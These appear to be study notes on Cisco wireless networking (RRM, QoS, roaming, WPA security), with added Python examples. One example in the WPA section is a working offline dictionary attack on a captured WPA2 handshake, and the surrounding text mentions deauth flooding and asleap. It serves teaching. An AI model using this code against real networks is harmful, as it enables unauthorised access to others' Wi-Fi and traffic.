- RF group has the same name on WLCs
- APs from WLC1 can hear at least one AP from WLC2 (RSSI ≥ -80 dBm)
- every 60s APs send neighbour discovery packet (NDP) at max transmission power
- RF group leader
- elected per group
- collects neighbour reports from all APs and runs the TPC and DCA algorithms
- transmit power control (TPC)
- APs build a list of neighbour APs with the RSSI at which they hear them (NDPs are sent at max power), send the list to the leader
- overlap condition: 3 or more neighbours hear the AP above the threshold (third-strongest neighbour RSSI > threshold)
- threshold = -70 dBm by default
- action on overlap: decrease Tx power by one level (3 dB)
- 8 power levels: 1 ≡ 23 dBm (max), each level 3 dB lower, 8 ≡ 2 dBm
- new APs initially transmit at max power
- dynamic channel allocation (DCA)
- new APs initially use channel 1 (2.4 GHz) or channel 36 (5 GHz)
- convergence time: 100 min
- metrics:
- RSSI AP: always on
- 802.11 interference: enabled by default
- non-802.11 noise: enabled by default
- AP traffic load
- disabled by default
- if AP is under heavy load, WLC may prefer not to change channel
- persistent interference
- disabled by default
- avoid channels that have transmitter with long pulse and short pause
- coverage hole detection mitigation (CHDM)
- triggered by RF change, not by timer
- coverage hole:
- client RSSI ≤ -80 dBm
- low RSSI for at least 60s out of latest 180s
- at least 3 clients on WLC or 25% on AP are affected
- event-driven RRM (ED-RRM): immediate channel change when CleanAir reports severe interference, without waiting for the next DCA run
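The TPC overlap rule and the coverage-hole criteria above are simple enough to reproduce, which is useful when the WLC's power and channel decisions look wrong and you want to check them against the neighbour and client data it shows. The following is an added example (my code, not Cisco's RRM implementation) that applies the third-strongest-neighbour rule at the listed threshold and power levels, and the coverage-hole test with the listed thresholds (client RSSI ≤ -80 dBm for 60 s out of 180 s, 3 clients or 25% affected). The neighbour report and client RSSI series are constructed sample data; the real algorithms include hysteresis and minimum/maximum power limits that are left out here.

```python
# Cisco power levels as listed above: level 1 = 23 dBm (max), each further level 3 dB lower
POWER_LEVEL_DBM = {level: 23 - 3 * (level - 1) for level in range(1, 9)}
TPC_THRESHOLD_DBM = -70


def tpc_overlap(neighbor_rssi, threshold=TPC_THRESHOLD_DBM):
    """Overlap condition: the third-strongest neighbour hears this AP above the threshold."""
    strongest = sorted(neighbor_rssi, reverse=True)
    return len(strongest) >= 3 and strongest[2] > threshold


def tpc_target_level(neighbor_rssi_at_max, threshold=TPC_THRESHOLD_DBM):
    """Step the power down one level (3 dB) per run, as the leader does, until the
    third-strongest neighbour no longer hears the AP above the threshold.
    The RSSI values come from NDPs sent at max power, so each level takes 3 dB off all of them."""
    level = 1
    while level < 8 and tpc_overlap([r - 3 * (level - 1) for r in neighbor_rssi_at_max], threshold):
        level += 1
    return level


def coverage_hole(rssi_samples, rssi_threshold=-80, min_bad_s=60,
                  min_clients=3, min_fraction=0.25):
    """rssi_samples: {client: [RSSI per second over the last 180 s]}.
    A client is failing if >= min_bad_s of its samples are at or below the threshold;
    a coverage hole exists if >= min_clients or >= min_fraction of the AP's clients fail."""
    failing = [c for c, s in rssi_samples.items()
               if sum(r <= rssi_threshold for r in s) >= min_bad_s]
    total = len(rssi_samples)
    hole = bool(failing) and (len(failing) >= min_clients or len(failing) / total >= min_fraction)
    return hole, failing


# Constructed neighbour report for one AP: RSSI (dBm) at which five neighbours hear its NDPs
SAMPLE_NEIGHBORS = [-48, -52, -55, -68, -79]
# Constructed per-second client RSSI for the last 180 s
SAMPLE_CLIENTS = {
    "aa:bb:cc:dd:ee:01": [-85] * 70 + [-72] * 110,   # 70 s at or below -80 dBm: failing
    "aa:bb:cc:dd:ee:02": [-65] * 180,
    "aa:bb:cc:dd:ee:03": [-83] * 30 + [-70] * 150,   # only 30 s bad: not failing
    "aa:bb:cc:dd:ee:04": [-60] * 180,
}
```

With the sample report the AP ends up at level 6 (8 dBm): at that power the third neighbour hears it at exactly -70 dBm. Note that TPC only looks at AP-to-AP hearing, which is why a dense AP layout can drive power down to the point where clients at the cell edge fall into the -80 dBm coverage-hole regime; the two mechanisms pull in opposite directions and the CHDM thresholds are the safety net.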
CleanAir
- detects interference sources, their nature (microwave oven, Bluetooth, video bridge, jammer, ...) and location
- dedicated spectrum analysis engine (SAgE) ASIC in the AP radio classifies non-802.11 energy while the AP keeps serving clients (not the UADP switch ASIC)
Power
- effective isotropic radiated power (EIRP) = Tx power (dBm) - cable loss (dB) + antenna gain (dBi): the power an ideal isotropic antenna would need to radiate to produce the same signal
- maximums (FCC, 2.4 GHz)
- Tx: 30 dBm (1 W)
- EIRP: 36 dBm (30 dBm transmitter + 6 dBi antenna)
- P2MP links
- rule 1:1: for every 1 dBi of antenna gain above 6 dBi, reduce Tx by 1 dBm ⇒ EIRP stays ≤ 36 dBm
- P2P links
- rule 3:1: for every 3 dBi of antenna gain above 6 dBi, reduce Tx by only 1 dBm
- EIRP does not exceed 56 dBm
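The EIRP rules above are what you check when pairing a radio with a high-gain antenna; here is an added example (my code, not from the original notes) that computes EIRP from transmitter power, cable loss and antenna gain, converts between dBm and mW, and applies the 6 dBi baseline with the 1:1 (point-to-multipoint) and 3:1 (point-to-point) reduction rules to find the highest legal transmitter setting. The limits encoded are the FCC 2.4 GHz figures quoted above; other regulatory domains have different values.

```python
import math

FCC_MAX_TX_DBM = 30.0       # 1 W transmitter
FCC_BASE_GAIN_DBI = 6.0     # antenna gain allowed without any Tx reduction (36 dBm EIRP)
DBI_PER_DB_REDUCTION = {"p2mp": 1.0, "p2p": 3.0}   # 1:1 and 3:1 rules


def dbm_to_mw(dbm):
    return 10 ** (dbm / 10)


def mw_to_dbm(mw):
    return 10 * math.log10(mw)


def eirp_dbm(tx_dbm, antenna_dbi, cable_loss_db=0.0):
    """EIRP = transmitter power minus cable/connector loss plus antenna gain."""
    return tx_dbm - cable_loss_db + antenna_dbi


def max_tx_dbm(antenna_dbi, link="p2mp"):
    """Highest legal transmitter power for an antenna under the 2.4 GHz rules:
    above 6 dBi reduce Tx 1 dB per 1 dBi (p2mp) or per 3 dBi (p2p)."""
    excess = max(0.0, antenna_dbi - FCC_BASE_GAIN_DBI)
    return FCC_MAX_TX_DBM - excess / DBI_PER_DB_REDUCTION[link]


def check_link(tx_dbm, antenna_dbi, cable_loss_db=0.0, link="p2mp"):
    """Return (compliant, EIRP in dBm, max legal Tx in dBm) for a planned radio + antenna.
    Cable loss does not buy extra transmitter power: the rule is on the transmitter setting."""
    limit = max_tx_dbm(antenna_dbi, link)
    return tx_dbm <= limit, eirp_dbm(tx_dbm, antenna_dbi, cable_loss_db), limit
```

Running `check_link(30, 9)` on an omni deployment (30 dBm radio with a 9 dBi antenna) fails: the 1:1 rule caps the transmitter at 27 dBm so that EIRP stays at 36 dBm, while the same antenna on a point-to-point bridge may run at 29 dBm.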
Power save
- client switches its radio off for short periods (PWR MGT bit = 1 tells the AP)
- while client is sleeping, AP buffers frames to the client
- beacon contains the traffic indication map (TIM): bitmap of AIDs that have data buffered
- if the client sees its AID in the TIM, it sends PS-Poll to request one buffered frame (More data bit ⇒ poll again)
- delivery TIM (DTIM):
- sent every N beacons (DTIM period advertised in the beacon) ⇒ clients know when to wake and do not miss it
- announces buffered bcast/mcast data, which the AP sends right after the DTIM beacon ⇒ all clients wake to receive it
- disadvantage – AP-centric: one PS-Poll per frame, and every client must wake for every DTIM
Unscheduled automatic power save delivery (U-APSD)
- power save improvement:
- client-centric: client triggers delivery when it wants
- part of 802.11e / Wi-Fi Multimedia (WMM) power save (WMM-PS)
- AP buffers data in each queue, sends data as a whole on request (not per frame)
- client requests specific queue from AP
- 4 categories: QoS section
Target wake time (TWT)
- 802.11ax
- AP and STA negotiate a wake schedule:
- when the STA may sleep and for how long
- when the STA wakes and how long it waits for the AP
- negotiated in management (action) frames; fewer stations contend at any moment in dense cells
QoS
- CoS and UP are derived from the 3 MSB of DSCP, with the exceptions below (Cisco WLC mapping)
- platinum
- CS6: UP = 7, CoS = 6, DSCP = 48
- EF: UP = 6, CoS = 5, DSCP = 46
- gold
- AF41: UP = 5, CoS = 4, DSCP = 34
- AF31: UP = 4, CoS = 3, DSCP = 26
- silver
- AF21: UP = 3, CoS = 2, DSCP = 18
- BE: UP = 0, CoS = 0, DSCP = 0
- bronze
- AF11: UP = 2, CoS = 1, DSCP = 10
- upstream marking
- preserves inner DSCP
- CAPWAP DSCP – based on UP
- if client does not support WMM – default class for SSID
- CoS – based on inner DSCP
- if UP exceeds maximum permitted value for the class – reduce CAPWAP DSCP to max permitted value
- UP = 4 → AF31 ≠ CS3 (voice control) ⇒ remap AF31 to CS3 on first-hop switch
- downstream marking
- preserves inner DSCP
- inner DSCP → CAPWAP DSCP
- CAPWAP DSCP → UP
- if inner DSCP exceeds maximum permitted value for the class – reduce CAPWAP DSCP to max permitted value
- in order to match DSCP and UP, the last-hop switch must remap the CAPWAP DSCP from CS3 to DSCP 33 (falls under gold)
- default DSCP
- WLC classes
- platinum: EF (46)
- gold: AF41 (34)
- silver: DF (0)
- bronze: AF11 (10)
- does not match common markings ≡ breaks wired QoS (e.g., voice signalling)
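The upstream and downstream marking rules above are where wireless QoS usually breaks in practice (voice arriving in the wrong queue on the wired side), so the following added example (my code, not Cisco's implementation) encodes the DSCP-to-UP table listed above, the per-profile cap and the profile defaults, and traces a packet through the WLC in both directions. The per-profile maximum UP (7/5/3/2) is taken from the class rows above; the UP 1 → CS1 entry in the reverse table is my assumption, since the notes list no UP 1 row.

```python
# WLC DSCP → 802.11e UP: 3 MSB of DSCP except the rows listed above
DSCP_TO_UP_EXCEPTIONS = {48: 7, 46: 6, 34: 5, 26: 4, 18: 3, 10: 2}   # CS6, EF, AF41, AF31, AF21, AF11
# Outer CAPWAP DSCP chosen per UP (reverse of the table; UP 1 → CS1 is an assumption)
UP_TO_DSCP = {7: 48, 6: 46, 5: 34, 4: 26, 3: 18, 2: 10, 1: 8, 0: 0}
# Highest UP permitted by each WLAN QoS profile, from the class rows above
PROFILE_MAX_UP = {"platinum": 7, "gold": 5, "silver": 3, "bronze": 2}
# Default DSCP used for non-WMM clients, from the "default DSCP" list above
PROFILE_DEFAULT_DSCP = {"platinum": 46, "gold": 34, "silver": 0, "bronze": 10}


def dscp_to_up(dscp):
    if not 0 <= dscp <= 63:
        raise ValueError("DSCP is a 6-bit value")
    return DSCP_TO_UP_EXCEPTIONS.get(dscp, dscp >> 3)


def cap_up(up, profile):
    return min(up, PROFILE_MAX_UP[profile])


def upstream(profile, inner_dscp, client_up=None):
    """Client → WLC. Inner DSCP is preserved; the CAPWAP outer DSCP is derived from the
    client's UP (profile default for non-WMM clients), capped by the profile maximum."""
    up = dscp_to_up(PROFILE_DEFAULT_DSCP[profile]) if client_up is None else client_up
    up = cap_up(up, profile)
    return {"inner_dscp": inner_dscp, "outer_dscp": UP_TO_DSCP[up], "up": up}


def downstream(profile, inner_dscp):
    """WLC → client. Inner DSCP is copied to the CAPWAP outer DSCP unless it exceeds the
    profile maximum, in which case the outer DSCP is reduced; the AP derives the UP from it."""
    wanted = dscp_to_up(inner_dscp)
    up = cap_up(wanted, profile)
    outer = inner_dscp if up == wanted else UP_TO_DSCP[up]
    return {"inner_dscp": inner_dscp, "outer_dscp": outer, "up": up}


def trace(profile, inner_dscp, client_up=None):
    """Both directions for one flow, for a quick check of a WLAN's QoS profile."""
    return {"upstream": upstream(profile, inner_dscp, client_up),
            "downstream": downstream(profile, inner_dscp)}
```

`trace("silver", 46, client_up=6)` shows the classic failure: a softphone marking EF on a silver WLAN leaves the WLC inside CAPWAP at AF21 and is queued as best effort on the wired side, while the inner DSCP still says EF; the fix is the WLAN profile, not the switch.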
Enhanced distributed channel access (EDCA)
- 802.11e, Wi-Fi Multimedia (WMM)
- improvement of DCF: increases the probability that high-priority traffic is served first
- per-AC contention window (CW) instead of one for all (DCF default: CWmin = 15, CWmax = 1023)
- user priority (UP): ≈ CoS, 3 bits, carried in the QoS Control field
- voice marking mismatch: UP = 6 and CoS = 5 (3 in RFC)
- arbitration interframe space number (AIFSN)
- per-AC replacement for DIFS: AIFS = SIFS + AIFSN × slot time; smaller AIFSN ≡ earlier access
- transmission opportunity (TXOP)
- time a station may keep the medium after winning contention, sending several frames with only SIFS between them (plain NAV reserves a single frame)
- 0 ≡ only one frame can be transmitted
- access categories (AC), WMM defaults for OFDM PHYs
- AC_VO
- voice
- WLC: platinum
- UP = 7, 6
- AIFSN = 2 slots
- CWmin = 3, CWmax = 7
- TXOP = 1.504 ms
- AC_VI
- video
- WLC: gold
- UP = 5, 4
- AIFSN = 2 slots
- CWmin = 7, CWmax = 15
- TXOP = 3.008 ms
- AC_BE
- best effort
- WLC: silver
- UP = 3, 0
- AIFSN = 3 slots
- CWmin = 15, CWmax = 1023
- TXOP = 0
- AC_BK
- background
- WLC: bronze
- UP = 2, 1
- AIFSN = 7 slots
- CWmin = 15, CWmax = 1023
- TXOP = 0
- transmission specification (Tspec)
- call admission control: does not allow new flows in AC if there is no room ⇒ protect existing flows in AC
- optional for implementation in WMM
- radio interface level, not SSID
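The IFS and backoff mechanics from the IEEE 802.11 section and the per-AC parameters above combine into a few lines of arithmetic, and the effect is easier to see in a simulation than in the table. The following is an added example (my code, not from the original notes) that computes AIFS and the exponential contention window for each AC with the 802.11a/g/n OFDM timing (SIFS 16 µs, slot 9 µs) and then runs a saturated contention between one station per AC to show who wins the medium. The WMM parameters are the defaults listed above; the simulation ignores TXOP, collisions between two stations that draw the same slot, and the retry-dependent CW growth.

```python
import random

SIFS_US, SLOT_US = 16, 9          # 802.11a/g/n OFDM PHY timing
# AC → (AIFSN, CWmin, CWmax, TXOP limit in µs), WMM defaults for OFDM PHYs as listed above
EDCA_PARAMS = {"AC_VO": (2, 3, 7, 1504), "AC_VI": (2, 7, 15, 3008),
               "AC_BE": (3, 15, 1023, 0), "AC_BK": (7, 15, 1023, 0)}


def difs_us():
    """Legacy DCF: DIFS = SIFS + 2 × slot."""
    return SIFS_US + 2 * SLOT_US


def aifs_us(ac):
    """AIFS = SIFS + AIFSN × slot; AIFSN 2 equals DIFS, larger values wait longer."""
    return SIFS_US + EDCA_PARAMS[ac][0] * SLOT_US


def contention_window(ac, retry=0):
    """Binary exponential backoff: (CW + 1) doubles per retry, capped at CWmax."""
    cwmin, cwmax = EDCA_PARAMS[ac][1], EDCA_PARAMS[ac][2]
    return min((cwmin + 1) << retry, cwmax + 1) - 1


def mean_access_delay_us(ac, retry=0):
    """Expected wait before transmitting on an idle medium: AIFS + mean backoff."""
    return aifs_us(ac) + contention_window(ac, retry) / 2 * SLOT_US


def contend(rng, acs):
    """One contention round: each AC draws a backoff; the earliest timer wins (ties → higher AC)."""
    timers = {ac: aifs_us(ac) + rng.randint(0, contention_window(ac)) * SLOT_US for ac in acs}
    return min(timers, key=timers.get)


def win_share(trials=20000, seed=1):
    """Fraction of rounds won by each AC when one station per AC always has a frame ready."""
    rng = random.Random(seed)
    acs = list(EDCA_PARAMS)           # ordered VO, VI, BE, BK so ties favour priority
    wins = {ac: 0 for ac in acs}
    for _ in range(trials):
        wins[contend(rng, acs)] += 1
    return {ac: wins[ac] / trials for ac in acs}
```

Two things fall out of the numbers: AC_VO's worst case (34 + 3 × 9 = 61 µs) is below AC_BK's best case (79 µs), so under saturation background traffic never wins a round against a voice station; and AC_BE at retry 7 sits at CW 1023, which is why a retransmitting best-effort client on a noisy channel waits milliseconds per attempt while voice frames keep going through.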
Low latency MAC
- drop real-time packets that remain in the queue for too long (client will discard them anyway)
- WMM and proper DSCP marking are required
SIP snooping
- media session snooping and reporting
- application may not set correct UP – need to look into SIP (UDP 5060) and determine RTP ports
- platinum or gold QoS profile is required
- puts voice into UP = 6 regardless DSCP value – processed in Voice AC
Application visibility and control (AVC)
- can change inner DSCP: applied before QoS and CAPWAP encapsulation
- processed on WLC, not AP
Catalyst 3850
- trusts QoS by default, except for wired-wireless bridging (rewrites to 0)
; trust DSCP between wired and wireless
(config)# no qos wireless-default-untrust
Roaming
AP level
- when a client roams to another AP, it does not know the new AP's channel ⇒ active/passive scan on all channels (slow, gaps in traffic)
- assisted roaming
- 802.11k
- client requests the neighbour report from its current AP (adjacent APs and their channels): scans only those channels
- layout:
- adjacent BSS must be on different channels: less co-channel interference
- adjacent BSS must overlap, ≈ 20%
- cell edge = -67 dBm
Fast roaming
- 802.11r (fast BSS transition, FT)
- key hierarchy (PMK-R0 → PMK-R1 per AP) and PTK derivation happen during reassociation ⇒ no full 802.1X/4-way handshake on every roam
- pairwise transient key (PTK) derived from PMK-R1 with nonces exchanged in the FT authentication/reassociation frames
- types
- over-the-air: client negotiates with the target AP directly (FT authentication frames)
- over-the-DS: client asks its current AP to relay the FT request to the target AP through the DS (action frames)
WLC level
- OSI L2
- WLC within same VLAN
- client retains IP, remains in the same VLAN
- fast: ≈ 20 ms
- not scalable: VLAN has to be stretched
- OSI L3
- client changes VLAN when switching to another AP
- WLCs build mobility tunnels between each other
- IP protocol 97 (EtherIP) for client data
- UDP 16666 for mobility control traffic (16667 when encrypted)
- client data returning to the client is tunnelled from anchor to foreign
- anchor controller: original controller, point of presence (PoP): the client's IP address lives here
- foreign controller: new controller, point of attachment (PoA): the AP the client is on
- traffic modes
- all through anchor controller (symmetric)
- single point of policy enforcement (e.g., guest WLAN)
- egress: AP → foreign → anchor → server
- ingress: server → anchor → foreign → AP
- local handoff at foreign controller (asymmetric)
- asymmetric path ⇒ stateful firewalls may drop the flow
- egress: AP → foreign → server
- ingress: server → anchor → foreign → AP
- WLC functions
- mobility agent (MA)
- interaction with clients
- CAPWAP tunnels
- client DB
- security
- QoS
- mobility controller (MC)
- high-level mgmt
- roaming
- radio resource mgmt (RRM)
- wireless IPS
- guest access
- wireless controller module (WCM): MA, can be MC as well
- mobility anchor: static anchor for guest WLAN
- static IP tunnelling: WLC communicate and tunnel traffic from static IP
- WLC upstream interface – L2 port-channel (no routing capabilities)
- WLC hierarchy
- mobility group
- WLC group (MC and MA)
- roaming between WLCs is permitted (list of MAC addresses)
- switch peer group (SPG)
- MAs in the same SPG form a full mesh of CAPWAP tunnels between themselves
- faster roaming inside the SPG (no detour via the MC)
- mobility subdomain
- MA group, connected to same MC
- mobility domain
- all groups within enterprise
Security
- authC methods
- Open
- WEP
- RC4 stream cipher with a static 40/104-bit key
- weaknesses: no key rotation, 24-bit IV (keystream reuse), CRC-32 ICV is not a MAC (bit flipping), FMS/PTW key recovery in minutes
- 802.1X/EAP
- lightweight EAP (LEAP)
- Cisco proprietary; MS-CHAP-style challenge/response, dynamic per-session WEP keys changed frequently
- RADIUS
- broken: the challenge/response can be brute-forced offline (asleap); do not deploy
- EAP flexible authC by secure tunnelling (EAP-FAST)
- TLS tunnel for the inner authC, established with a protected access credential (PAC) instead of a server certificate
- RADIUS
- supports PAC (provisioned out of band or anonymously in phase 0)
- protected EAP (PEAP)
- ≈ EAP-FAST, but the tunnel is built from the server certificate; the client must validate it (otherwise an evil twin with a rogue RADIUS harvests credentials)
- inner client authC: MS-CHAPv2, generic token card (GTC)
- EAP-TLS
- mutual certificate authentication: client certificate instead of a password
- strongest option; requires PKI and client certificate deployment
- privacy methods
- Temporal Key Integrity Protocol (TKIP)
- 802.11i interim fix for WEP hardware, still RC4
- message integrity check (MIC, "Michael") over src/dst MAC, priority and payload; 48-bit TKIP sequence counter (TSC) ≡ extended IV, replay protection
- per-packet 128-bit RC4 key from key mixing of the temporal key, TA and TSC
- deprecated: Michael is weak, 802.11n/ac do not allow TKIP at HT/VHT rates
- counter mode with CBC-MAC protocol (CCMP)
- AES-128 in counter mode (confidentiality) + CBC-MAC (integrity): authenticated encryption of the payload and header fields
Wi-Fi Protected Access (WPA)
- Wi-Fi Alliance certifications
- WPA: pre-standard (subset of the 802.11i draft: 802.1X, TKIP)
- WPA2: full 802.11i + CCMP (TKIP only for legacy compatibility)
- WPA3: SAE (Dragonfly) replaces the PSK 4-way handshake ⇒ no offline dictionary attack on a captured handshake; PMF mandatory
- authC
- personal: pre-shared key (PSK), PMK = PBKDF2(passphrase, SSID)
- enterprise: 802.1X, PMK delivered by RADIUS after EAP
- per-client keys (PTK) derived from PMK + nonces + MAC addresses in the 4-way handshake
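The PSK and per-client-key items above are the whole story of WPA2-Personal's weakness, and it is worth seeing the arithmetic. The following is an added example (my code, not from the original notes or any vendor) that derives the PMK from a passphrase and SSID with PBKDF2, expands it into the PTK (KCK, KEK, TK) from the two MAC addresses and nonces of a 4-way handshake, computes the EAPOL-Key MIC the way a WPA2 supplicant does, and then runs the offline dictionary attack that a captured handshake enables. The SSID, MAC addresses, nonces and EAPOL bytes are constructed; the EAPOL frame is an opaque placeholder and is not parsed. The PBKDF2 test vector ("password"/"IEEE") is the one from the 802.11 standard.

```python
import hashlib
import hmac


def pmk_from_passphrase(passphrase, ssid):
    """WPA/WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key, label, data, nbytes):
    """IEEE 802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ... concatenated."""
    out, i = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_ptk(pmk, aa, spa, anonce, snonce):
    """4-way handshake: PTK = PRF-384(PMK, "Pairwise key expansion", min/max of MACs and nonces).
    Returns (KCK, KEK, TK): handshake MIC key, key-wrap key and the CCMP temporal key."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    ptk = prf(pmk, b"Pairwise key expansion", data, 48)
    return ptk[:16], ptk[16:32], ptk[32:48]


def eapol_mic(kck, eapol_with_zero_mic):
    """WPA2 (key descriptor version 2): MIC = HMAC-SHA1(KCK, EAPOL-Key frame with MIC zeroed)[:16]."""
    return hmac.new(kck, eapol_with_zero_mic, hashlib.sha1).digest()[:16]


def crack_psk(candidates, ssid, aa, spa, anonce, snonce, eapol_zero_mic, captured_mic):
    """Offline dictionary attack on a captured handshake: one PBKDF2 per guess, then
    recompute the message-2 MIC and compare. Returns the passphrase or None."""
    for guess in candidates:
        kck, _, _ = derive_ptk(pmk_from_passphrase(guess, ssid), aa, spa, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, eapol_zero_mic), captured_mic):
            return guess
    return None


# Constructed handshake parameters (not a real capture)
SSID = "CorpWiFi"
AA = bytes.fromhex("001122334455")         # authenticator (AP BSSID)
SPA = bytes.fromhex("aabbccddee01")        # supplicant (client)
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
# Placeholder EAPOL-Key message 2 with its 16-byte MIC field zeroed (constructed bytes)
EAPOL_MSG2_ZERO_MIC = (bytes.fromhex("0103007502010a00") + bytes(8) + SNONCE
                       + bytes(16) + bytes(8) + bytes(8) + bytes(16) + b"\x00\x00")


def simulate_capture(true_passphrase):
    """What a sniffer sees from a legitimate client: the MIC computed with the real PSK."""
    kck, _, _ = derive_ptk(pmk_from_passphrase(true_passphrase, SSID), AA, SPA, ANONCE, SNONCE)
    return eapol_mic(kck, EAPOL_MSG2_ZERO_MIC)
```

Two consequences are visible in the code. The attack needs nothing from the network except four values in cleartext (two MACs, two nonces) plus one MIC, and its cost is one PBKDF2 per guess, so a deauth flood that forces a reconnect is all an attacker needs to start. And because the PTK is a pure function of PMK, MACs and nonces, anyone holding the PSK who captured a client's handshake recovers that client's TK and decrypts its traffic, which is the "per-client keys" caveat: per client, but not private from other PSK holders. SAE in WPA3 removes both properties.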
Management frame protection (MFP)
- client requirements: WPA2 and CCXv5 (Cisco Compatible Extensions)
- infrastructure
- AP appends MIC
- if MIC does not match, AP notifies WLC
- client
- MIC
- encryption between client and AP
802.11w
- protected management frames (PMF)
- uses the existing security association (PTK for unicast, IGTK for bcast/mcast) to protect robust management frames
- protects disassociation, deauthentication and action frames: unicast with CCMP, bcast/mcast with the broadcast/multicast integrity protocol (BIP)
- requires WPA2/CCMP (RSN); optional in WPA2, mandatory in WPA3
- does not replace infrastructure MFP: beacons and probe responses stay unprotected, so a rogue AP spoofing the BSSID is still caught only by MFP
Client exclusion
- deny client service for 60s by default
- reasons
- excessive 802.11 association failures
- excessive 802.11 authentication failures
- excessive 802.1X authentication failures
- IP theft or IP reuse
- excessive web authentication failures
Design
- signal strength
- max: -30 dBm
- normal: -40 dBm
- min for real-time: -67 dBm
- min: -80 dBm
- SNR
- min: 10 dB
- min for real-time: 25 dB
- roaming takes less than 15 ms
Real-time traffic
- allocate own SSID: admission control
- disable slow data rates: slow clients occupy air time and add jitter for everyone else
High density
- use high minimum data rate ≡ reduce cell size for the client, utilizing SNR
- lower channel width ≡ lower co-channel interference
- air time – limited resource ⇒ client onboarding ASAP (even at the cost of roaming)
- 50 users per AP interface
Wi-Fi mesh
- throughput is halved for each additional hop
Hyperlocation
- uses angle of arrival (AoA) on the AP in addition to RSSI triangulation
- precision: 1-3m (triangulation: 5-10m)
- uses separate antenna array
- DNA Spaces is required
- manual placement of APs on map